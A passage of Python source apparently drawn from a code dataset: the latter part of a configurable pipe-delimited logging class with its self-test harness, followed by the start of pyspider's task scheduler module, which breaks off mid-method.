mode=self._sizeRotateMode, \
encoding=None, delay=False)
elif self._typeLogger == 'stderrlogger':
self._logHandler = logging.handlers.StreamHandler(sys.stderr)
elif self._typeLogger == 'stdoutlogger':
self._logHandler = logging.handlers.StreamHandler(sys.stdout)
elif self._typeLogger == 'socketlogger':
self._logHandler = logging.handlers.SocketHandler(self._socketHost, self._socketPort)
elif self._typeLogger == 'nulllogger':
self._logHandler = logging.handlers.NullHandler()
if self._fields["style"] == CommonLogger.AuditFile or self._fields["style"] == CommonLogger.MetricsFile:
self._logFormatter = logging.Formatter(fmt='%(begtime)s,%(begmsecs)03d+00:00|%(endtime)s,%(endmsecs)03d+00:00|%(message)s', datefmt=CommonLogger.DateFmt)
else:
self._logFormatter = logging.Formatter(fmt='%(asctime)s,%(msecs)03d+00:00|%(message)s', datefmt='%Y-%m-%dT%H:%M:%S')
self._logFormatter.converter = time.gmtime
self._logHandler.setFormatter(self._logFormatter)
self._logger.addHandler(self._logHandler)
def _resetStyleField(self):
styleFields = ["error", "debug", "audit", "metrics"]
if self._fields['style'] in styleFields:
self._fields['style'] = styleFields.index(self._fields['style'])
def __del__(self):
if self._monitorFlag == False:
return
self._monitorFlag = False
if self._monitorThread is not None and self._monitorThread.is_alive():
self._monitorThread.join()
self._monitorThread = None
def _defaultServerInfo(self):
# If not set or purposely set = None, then set default
if self._fields.get('server') is None:
try:
self._fields['server'] = socket.getfqdn()
except Exception as err:
try:
self._fields['server'] = socket.gethostname()
except Exception as err:
self._fields['server'] = ""
# If not set or purposely set = None, then set default
if self._fields.get('serverIPAddress') is None:
try:
self._fields['serverIPAddress'] = socket.gethostbyname(self._fields['server'])
except Exception as err:
self._fields['serverIPAddress'] = ""
def _monitorConfigFile(self):
while self._monitorFlag:
try:
fileTime = os.path.getmtime(self._configFile)
if fileTime > self._configFileModified:
self._configFileModified = fileTime
ReopenLogFile = False
logFile = self._logFile
with open(self._configFile) as fp:
for line in fp:
line = line.split('#',1)[0] # remove comments
if '=' in line:
key, value = [x.strip() for x in line.split('=',1)]
if key == 'rotateMethod' and value.lower() in ['time', 'size', 'none'] and self._rotateMethod != value:
self._rotateMethod = value.lower()
ReopenLogFile = True
elif key == 'timeRotateIntervalType' and value in ['S', 'M', 'H', 'D', 'W0', 'W1', 'W2', 'W3', 'W4', 'W5', 'W6', 'midnight']:
self._timeRotateIntervalType = value
ReopenLogFile = True
elif key == 'timeRotateInterval' and int( value ) > 0:
self._timeRotateInterval = int( value )
ReopenLogFile = True
elif key == 'sizeMaxBytes' and int( value ) >= 0:
self._sizeMaxBytes = int( value )
ReopenLogFile = True
elif key == 'sizeRotateMode' and value in ['a']:
self._sizeRotateMode = value
ReopenLogFile = True
elif key == 'backupCount' and int( value ) >= 0:
self._backupCount = int( value )
ReopenLogFile = True
elif key == self._logKey + 'SocketHost' and self._socketHost != value:
self._socketHost = value
ReopenLogFile = True
elif key == self._logKey + 'SocketPort' and self._socketPort > 0 and self._socketPort != int( value ):
self._socketPort = int( value )
ReopenLogFile = True
elif key == self._logKey + 'LogLevel' and self._logLevelThreshold != self._intLogLevel( value.upper() ):
self._logLevelThreshold = self._intLogLevel(value.upper())
elif key == self._logKey + 'LogType' and self._typeLogger != value and value.lower() in ['filelogger', 'stdoutlogger', 'stderrlogger', 'socketlogger', 'nulllogger']:
self._typeLogger = value.lower()
ReopenLogFile = True
elif key == self._logKey + 'Style':
self._fields["style"] = value
self._resetStyleField()
elif key == self._logKey and self._logFile != value:
logFile = value
ReopenLogFile = True
if ReopenLogFile:
with self._logLock:
self._logger.removeHandler(self._logHandler)
self._logFile = logFile
self._createLogger()
except Exception as err:
pass
time.sleep(5)
def setFields(self, **kwargs):
"""Set default values for log fields.
Keyword arguments: Annotations are d:debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
for key in ['style', 'requestID', 'serviceInstanceID', 'threadID', 'serverName', 'serviceName', 'instanceUUID', \
'severity', 'serverIPAddress', 'server', 'IPAddress', 'className', 'timer', \
'partnerName', 'targetEntity', 'targetServiceName', 'statusCode', 'responseCode', \
'responseDescription', 'processKey', 'targetVirtualEntity', 'customField1', \
'customField2', 'customField3', 'customField4', 'errorCategory', 'errorCode', \
'errorDescription' ]:
if key in kwargs:
if kwargs[key] != None:
self._fields[key] = kwargs[key]
elif key in self._fields:
del self._fields[key]
self._defaultServerInfo()
def debug(self, message, **kwargs):
"""Write a DEBUG level message to the log file.
Arguments:
message -- value for the last log record field.
Keyword arguments: Annotations are d:debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('DEBUG', message, **kwargs)
def info(self, message, **kwargs):
"""Write an INFO level message to the log file.
Arguments:
message -- value for the last log record field.
Keyword arguments: Annotations are d:debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('INFO', message, **kwargs)
def warn(self, message, **kwargs):
"""Write a WARN level message to the log file.
Arguments:
message -- value for the last log record field.
Keyword arguments: Annotations are d:debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('WARN', message, **kwargs)
def error(self, message, **kwargs):
"""Write an ERROR level message to the log file.
Arguments:
message -- value for the last log record field.
Keyword arguments: Annotations are d:debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('ERROR', message, **kwargs)
def fatal(self, message, **kwargs):
"""Write a FATAL level message to the log file.
Arguments:
message -- value for the last log record field.
Keyword arguments: Annotations are d:debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
self._log('FATAL', message, **kwargs)
def _log(self, logLevel, message, **kwargs):
"""Write a message to the log file.
Arguments:
logLevel -- value ('DEBUG', 'INFO', 'WARN', 'ERROR', 'FATAL', ...) for the log record.
message -- value for the last log record field.
Keyword arguments: Annotations are d:debug, a=audit, m=metrics, e=error
style -- the log file format (style) to use when writing log messages
requestID (dame) -- optional default value for this log record field.
serviceInstanceID (am) -- optional default value for this log record field.
threadID (am) -- optional default value for this log record field.
serverName (am) -- optional default value for this log record field.
serviceName (am) -- optional default value for this log record field.
instanceUUID (am) -- optional default value for this log record field.
severity (am) -- optional default value for this log record field.
serverIPAddress (am) -- optional default value for this log record field.
server (am) -- optional default value for this log record field.
IPAddress (am) -- optional default value for this log record field.
className (am) -- optional default value for this log record field.
timer (am) -- (ElapsedTime) optional default value for this log record field.
partnerName (ame) -- optional default value for this log record field.
targetEntity (me) -- optional default value for this log record field.
targetServiceName (me) -- optional default value for this log record field.
statusCode (am) -- optional default value for this log record field.
responseCode (am) -- optional default value for this log record field.
responseDescription (am) -- optional default value for this log record field.
processKey (am) -- optional default value for this log record field.
targetVirtualEntity (m) -- optional default value for this log record field.
customField1 (am) -- optional default value for this log record field.
customField2 (am) -- optional default value for this log record field.
customField3 (am) -- optional default value for this log record field.
customField4 (am) -- optional default value for this log record field.
errorCategory (e) -- optional default value for this log record field.
errorCode (e) -- optional default value for this log record field.
errorDescription (e) -- optional default value for this log record field.
Note: the pipe '|' character is not allowed in any log record field.
"""
# timestamp will automatically be inserted
style = int(self._getVal('style', '', **kwargs))
requestID = self._getVal('requestID', '', **kwargs)
serviceInstanceID = self._getVal('serviceInstanceID', '', **kwargs)
threadID = self._getVal('threadID', threading.currentThread().getName(), **kwargs)
serverName = self._getVal('serverName', '', **kwargs)
serviceName = self._getVal('serviceName', '', **kwargs)
instanceUUID = self._getVal('instanceUUID', '', **kwargs)
upperLogLevel = self._noSep(logLevel.upper())
severity = self._getVal('severity', '', **kwargs)
serverIPAddress = self._getVal('serverIPAddress', '', **kwargs)
server = self._getVal('server', '', **kwargs)
IPAddress = self._getVal('IPAddress', '', **kwargs)
className = self._getVal('className', '', **kwargs)
timer = self._getVal('timer', '', **kwargs)
partnerName = self._getVal('partnerName', '', **kwargs)
targetEntity = self._getVal('targetEntity', '', **kwargs)
targetServiceName = self._getVal('targetServiceName', '', **kwargs)
statusCode = self._getVal('statusCode', '', **kwargs)
responseCode = self._getVal('responseCode', '', **kwargs)
responseDescription = self._noSep(self._getVal('responseDescription', '', **kwargs))
processKey = self._getVal('processKey', '', **kwargs)
targetVirtualEntity = self._getVal('targetVirtualEntity', '', **kwargs)
customField1 = self._getVal('customField1', '', **kwargs)
customField2 = self._getVal('customField2', '', **kwargs)
customField3 = self._getVal('customField3', '', **kwargs)
customField4 = self._getVal('customField4', '', **kwargs)
errorCategory = self._getVal('errorCategory', '', **kwargs)
errorCode = self._getVal('errorCode', '', **kwargs)
errorDescription = self._noSep(self._getVal('errorDescription', '', **kwargs))
detailMessage = self._noSep(message)
if bool(re.match(r" *$", detailMessage)):
return # don't log empty messages
useLevel = self._intLogLevel(upperLogLevel)
if useLevel >= self._logLevelThreshold:
with self._logLock:
if style == CommonLogger.ErrorFile:
self._logger.log(50, '%s|%s|%s|%s|%s|%s|%s|%s|%s|%s' \
%(requestID, threadID, serviceName, partnerName, targetEntity, targetServiceName,
errorCategory, errorCode, errorDescription, detailMessage))
elif style == CommonLogger.DebugFile:
self._logger.log(50, '%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s' \
%(requestID, threadID, serverName, serviceName, instanceUUID, upperLogLevel,
severity, serverIPAddress, server, IPAddress, className, timer, detailMessage))
elif style == CommonLogger.AuditFile:
endAuditTime, endAuditMsec = self._getTime()
if self._begTime is not None:
d = { 'begtime': self._begTime, 'begmsecs': self._begMsec, 'endtime': endAuditTime, 'endmsecs': endAuditMsec }
else:
d = { 'begtime': endAuditTime, 'begmsecs': endAuditMsec, 'endtime': endAuditTime, 'endmsecs': endAuditMsec }
self._begTime = None
unused = ""
self._logger.log(50, '%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s' \
%(requestID, serviceInstanceID, threadID, serverName, serviceName, partnerName,
statusCode, responseCode, responseDescription, instanceUUID, upperLogLevel,
severity, serverIPAddress, timer, server, IPAddress, className, unused,
processKey, customField1, customField2, customField3, customField4, detailMessage), extra=d)
elif style == CommonLogger.MetricsFile:
endMetricsTime, endMetricsMsec = self._getTime()
if self._begTime is not None:
d = { 'begtime': self._begTime, 'begmsecs': self._begMsec, 'endtime': endMetricsTime, 'endmsecs': endMetricsMsec }
else:
d = { 'begtime': endMetricsTime, 'begmsecs': endMetricsMsec, 'endtime': endMetricsTime, 'endmsecs': endMetricsMsec }
self._begTime = None
unused = ""
self._logger.log(50, '%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s' \
%(requestID, serviceInstanceID, threadID, serverName, serviceName, partnerName,
targetEntity, targetServiceName, statusCode, responseCode, responseDescription,
instanceUUID, upperLogLevel, severity, serverIPAddress, timer, server, IPAddress,
className, unused, processKey, targetVirtualEntity, customField1, customField2,
customField3, customField4, detailMessage), extra=d)
else:
print("!!!!!!!!!!!!!!!! style not set: %s" % self._fields["style"])
def _getTime(self):
ct = time.time()
lt = time.localtime(ct)
return (time.strftime(CommonLogger.DateFmt, lt), (ct - int(ct)) * 1000)
def setStartRecordEvent(self):
"""
Set the start time to be saved for both audit and metrics records
"""
self._begTime, self._begMsec = self._getTime()
def _getVal(self, key, default, **kwargs):
val = self._fields.get(key)
if key in kwargs: val = kwargs[key]
if val is None: val = default
return self._noSep(val)
def _noSep(self, message):
if message is None: return ''
return re.sub(r'[\|\n]', ' ', str(message))
def _intLogLevel(self, logLevel):
if logLevel == 'FATAL': useLevel = 50
elif logLevel == 'ERROR': useLevel = 40
elif logLevel == 'WARN': useLevel = 30
elif logLevel == 'INFO': useLevel = 20
elif logLevel == 'DEBUG': useLevel = 10
else: useLevel = 0
return useLevel
def _mkdir_p(self, filename):
"""Create missing directories from a full filename path like mkdir -p"""
if filename is None:
return
folder=os.path.dirname(filename)
if folder == "":
return
if not os.path.exists(folder):
try:
os.makedirs(folder)
except OSError as err:
print("error number %d creating %s directory to hold %s logfile: %s" %(err.errno, err.filename, filename, err.strerror), file=sys.stderr)
sys.exit(2)
except Exception as err:
print("error creating %s directory to hold %s logfile: %s" %(folder, filename, str(err)), file=sys.stderr)
sys.exit(2)
def __checkTime1(line):
format = r'[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]T[0-9][0-9]:[0-9][0-9]:[0-9][0-9],[0-9][0-9][0-9][+]00:00[|]'
format = r'[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:[0-9]{2},[0-9]{3}[+]00:00[|]'
m = re.match(format, line)
if not m:
print("ERROR: time string did not match proper time format, %s" %line)
print("\t: format=%s" % format)
return 1
return 0
def __checkTime2(line, different):
format = '[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]T[0-9][0-9]:[0-9][0-9]:([0-9][0-9]),([0-9][0-9][0-9])[+]00:00[|][0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9]T[0-9][0-9]:[0-9][0-9]:([0-9][0-9]),([0-9][0-9][0-9])[+]00:00[|]'
format = r'[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:([0-9]{2}),([0-9]{3})[+]00:00[|][0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}:([0-9]{2}),([0-9]{3})[+]00:00[|]'
m = re.match(format, line)
if not m:
print("ERROR: time strings did not match proper time format, %s" %line)
print("\t: format=%s" % format)
return 1
second1 = int(m.group(1))
msec1 = int(m.group(2))
second2 = int(m.group(3))
msec2 = int(m.group(4))
if second1 > second2: second2 += 60
t1 = second1 * 1000 + msec1
t2 = second2 * 1000 + msec2
diff = t2 - t1
# print("t1=%d (%d,%d) t2=%d (%d,%d), diff = %d" % (t1, second1, msec1, t2, second2, msec2, diff))
if different:
if diff < 500:
print("ERROR: times did not differ enough: %s" % line)
return 1
else:
if diff > 10:
print("ERROR: times were too far apart: %s" % line)
return 1
return 0
def __checkLog(logfile, numLines, numFields):
lineCount = 0
errorCount = 0
with open(logfile, "r") as fp:
for line in fp:
# print("saw line %s" % line)
lineCount += 1
c = line.count('|')
if c != numFields:
print("ERROR: wrong number of fields. Expected %d, got %d: %s" % (numFields, c, line))
errorCount += 1
if re.search("should not appear", line):
print("ERROR: a line appeared that should not have appeared, %s" % line)
errorCount += 1
elif re.search("single time", line):
errorCount += __checkTime1(line)
elif re.search("time should be the same", line):
errorCount += __checkTime2(line, different=False)
elif re.search("time should be different", line):
errorCount += __checkTime2(line, different=True)
else:
print("ERROR: an unknown message appeared, %s" % line)
errorCount += 1
if lineCount != numLines:
print("ERROR: expected %d lines, but got %d lines" % (numLines, lineCount))
errorCount += 1
return errorCount
if __name__ == "__main__":
import os
keepLogs = False
spid = str(os.getpid())
if keepLogs:
spid = ""
logcfg = "/tmp/log" + spid + ".cfg"
errorLog = "/tmp/error" + spid + ".log"
metricsLog = "/tmp/metrics" + spid + ".log"
auditLog = "/tmp/audit" + spid + ".log"
debugLog = "/tmp/debug" + spid + ".log"
import atexit
def cleanupTmps():
for f in [ logcfg, errorLog, metricsLog, auditLog, debugLog ]:
try:
os.remove(f)
except:
pass
if not keepLogs:
atexit.register(cleanupTmps)
with open(logcfg, "w") as o:
o.write("error = " + errorLog + "\n" +
"errorLogLevel = WARN\n" +
"metrics = " + metricsLog + "\n" +
"metricsLogLevel = INFO\n" +
"audit = " + auditLog + "\n" +
"auditLogLevel = INFO\n" +
"debug = " + debugLog + "\n" +
"debugLogLevel = DEBUG\n")
import uuid
instanceUUID = uuid.uuid1()
serviceName = "testharness"
errorLogger = CommonLogger(logcfg, "error", style=CommonLogger.ErrorFile, instanceUUID=instanceUUID, serviceName=serviceName)
debugLogger = CommonLogger(logcfg, "debug", style=CommonLogger.DebugFile, instanceUUID=instanceUUID, serviceName=serviceName)
auditLogger = CommonLogger(logcfg, "audit", style=CommonLogger.AuditFile, instanceUUID=instanceUUID, serviceName=serviceName)
metricsLogger = CommonLogger(logcfg, "metrics", style=CommonLogger.MetricsFile, instanceUUID=instanceUUID, serviceName=serviceName)
testsRun = 0
errorCount = 0
errorLogger.debug("error calling debug (should not appear)")
errorLogger.info("error calling info (should not appear)")
errorLogger.warn("error calling warn (single time)")
errorLogger.error("error calling error (single time)")
errorLogger.setStartRecordEvent()
time.sleep(1)
errorLogger.fatal("error calling fatal, after setStartRecordEvent and sleep (start should be ignored, single time)")
testsRun += 6
errorCount += __checkLog(errorLog, 3, 10)
auditLogger.debug("audit calling debug (should not appear)")
auditLogger.info("audit calling info (time should be the same)")
auditLogger.warn("audit calling warn (time should be the same)")
auditLogger.error("audit calling error (time should be the same)")
auditLogger.setStartRecordEvent()
time.sleep(1)
auditLogger.fatal("audit calling fatal, after setStartRecordEvent and sleep, time should be different)")
testsRun += 6
errorCount += __checkLog(auditLog, 4, 25)
debugLogger.debug("debug calling debug (single time)")
debugLogger.info("debug calling info (single time)")
debugLogger.warn("debug calling warn (single time)")
debugLogger.setStartRecordEvent()
time.sleep(1)
debugLogger.error("debug calling error, after SetStartRecordEvent and sleep (start should be ignored, single time)")
debugLogger.fatal("debug calling fatal (single time)")
errorCount += __checkLog(debugLog, 5, 13)
testsRun += 6
metricsLogger.debug("metrics calling debug (should not appear)")
metricsLogger.info("metrics calling info (time should be the same)")
metricsLogger.warn("metrics calling warn (time should be the same)")
metricsLogger.setStartRecordEvent()
time.sleep(1)
metricsLogger.error("metrics calling error, after SetStartRecordEvent and sleep, time should be different")
metricsLogger.fatal("metrics calling fatal (time should be the same)")
testsRun += 6
errorCount += __checkLog(metricsLog, 4, 28)
print("%d tests run, %d errors found" % (testsRun, errorCount))
|
scheduler.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-07 17:05:11
import itertools
import json
import logging
import os
import time
from collections import deque
from six import iteritems, itervalues
from six.moves import queue as Queue
from pyspider.libs import counter, utils
from pyspider.libs.base_handler import BaseHandler
from .task_queue import TaskQueue
logger = logging.getLogger('scheduler')
class Project(object):
'''
project for scheduler
'''
def __init__(self, scheduler, project_info):
'''
'''
self.scheduler = scheduler
self.active_tasks = deque(maxlen=scheduler.ACTIVE_TASKS)
self.task_queue = TaskQueue()
self.task_loaded = False
self._selected_tasks = False # selected tasks after recent pause
self._send_finished_event_wait = 0 # wait for scheduler.FAIL_PAUSE_NUM loop steps before sending the event
self.md5sum = None
self._send_on_get_info = False
self.waiting_get_info = True
self._paused = False
self._paused_time = 0
self._unpause_last_seen = None
self.update(project_info)
@property
def paused(self):
if self.scheduler.FAIL_PAUSE_NUM <= 0:
return False
# unpaused --(last FAIL_PAUSE_NUM task failed)--> paused --(PAUSE_TIME)--> unpause_checking
# unpaused <--(last UNPAUSE_CHECK_NUM task have success)--|
# paused <--(last UNPAUSE_CHECK_NUM task no success)--|
if not self._paused:
fail_cnt = 0
for _, task in self.active_tasks:
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
if 'process' not in task['track']:
logger.error('process not in task, %r', task)
if task['track']['process']['ok']:
break
else:
fail_cnt += 1
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
break
if fail_cnt >= self.scheduler.FAIL_PAUSE_NUM:
self._paused = True
self._paused_time = time.time()
elif self._paused is True and (self._paused_time + self.scheduler.PAUSE_TIME < time.time()):
self._paused = 'checking'
self._unpause_last_seen = self.active_tasks[0][1] if len(self.active_tasks) else None
elif self._paused == 'checking':
cnt = 0
fail_cnt = 0
for _, task in self.active_tasks:
if task is self._unpause_last_seen:
break
# ignore select task
if task.get('type') == self.scheduler.TASK_PACK:
continue
cnt += 1
if task['track']['process']['ok']:
# break with enough check cnt
cnt = max(cnt, self.scheduler.UNPAUSE_CHECK_NUM)
break
else:
fail_cnt += 1
if cnt >= self.scheduler.UNPAUSE_CHECK_NUM:
if fail_cnt == cnt:
self._paused = True
self._paused_time = time.time()
else:
self._paused = False
return self._paused is True
def update(self, project_info):
self.project_info = project_info
self.name = project_info['name']
self.group = project_info['group']
self.db_status = project_info['status']
self.updatetime = project_info['updatetime']
md5sum = utils.md5string(project_info['script'])
if self.md5sum != md5sum:
self.waiting_get_info = True
self.md5sum = md5sum
if self.waiting_get_info and self.active:
self._send_on_get_info = True
if self.active:
self.task_queue.rate = project_info['rate']
self.task_queue.burst = project_info['burst']
else:
self.task_queue.rate = 0
self.task_queue.burst = 0
logger.info('project %s updated, status:%s, paused:%s, %d tasks',
self.name, self.db_status, self.paused, len(self.task_queue))
def on_get_info(self, info):
self.waiting_get_info = False
self.min_tick = info.get('min_tick', 0)
self.retry_delay = info.get('retry_delay', {})
self.crawl_config = info.get('crawl_config', {})
@property
def active(self):
return self.db_status in ('RUNNING', 'DEBUG')
class Scheduler(object):
UPDATE_PROJECT_INTERVAL = 5 * 60
default_schedule = {
'priority': 0,
'retries': 3,
'exetime': 0,
'age': -1,
'itag': None,
}
LOOP_LIMIT = 1000
LOOP_INTERVAL = 0.1
ACTIVE_TASKS = 100
INQUEUE_LIMIT = 0
EXCEPTION_LIMIT = 3
DELETE_TIME = 24 * 60 * 60
DEFAULT_RETRY_DELAY = {
0: 30,
1: 1*60*60,
2: 6*60*60,
3: 12*60*60,
'': 24*60*60
}
FAIL_PAUSE_NUM = 10
PAUSE_TIME = 5*60
UNPAUSE_CHECK_NUM = 3
TASK_PACK = 1
STATUS_PACK = 2 # current not used
REQUEST_PACK = 3 # current not used
def __init__(self, taskdb, projectdb, newtask_queue, status_queue,
out_queue, data_path='./data', resultdb=None):
self.taskdb = taskdb
self.projectdb = projectdb
self.resultdb = resultdb
self.newtask_queue = newtask_queue
self.status_queue = status_queue
self.out_queue = out_queue
self.data_path = data_path
self._send_buffer = deque()
self._quit = False
self._exceptions = 0
self.projects = dict()
self._force_update_project = False
self._last_update_project = 0
self._last_tick = int(time.time())
self._postpone_request = []
self._cnt = {
"5m_time": counter.CounterManager(
lambda: counter.TimebaseAverageEventCounter(30, 10)),
"5m": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(30, 10)),
"1h": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(60, 60)),
"1d": counter.CounterManager(
lambda: counter.TimebaseAverageWindowCounter(10 * 60, 24 * 6)),
"all": counter.CounterManager(
lambda: counter.TotalCounter()),
}
self._cnt['1h'].load(os.path.join(self.data_path, 'scheduler.1h'))
self._cnt['1d'].load(os.path.join(self.data_path, 'scheduler.1d'))
self._cnt['all'].load(os.path.join(self.data_path, 'scheduler.all'))
self._last_dump_cnt = 0
def _update_projects(self):
'''Check project update'''
now = time.time()
if (
not self._force_update_project
and self._last_update_project + self.UPDATE_PROJECT_INTERVAL > now
):
return
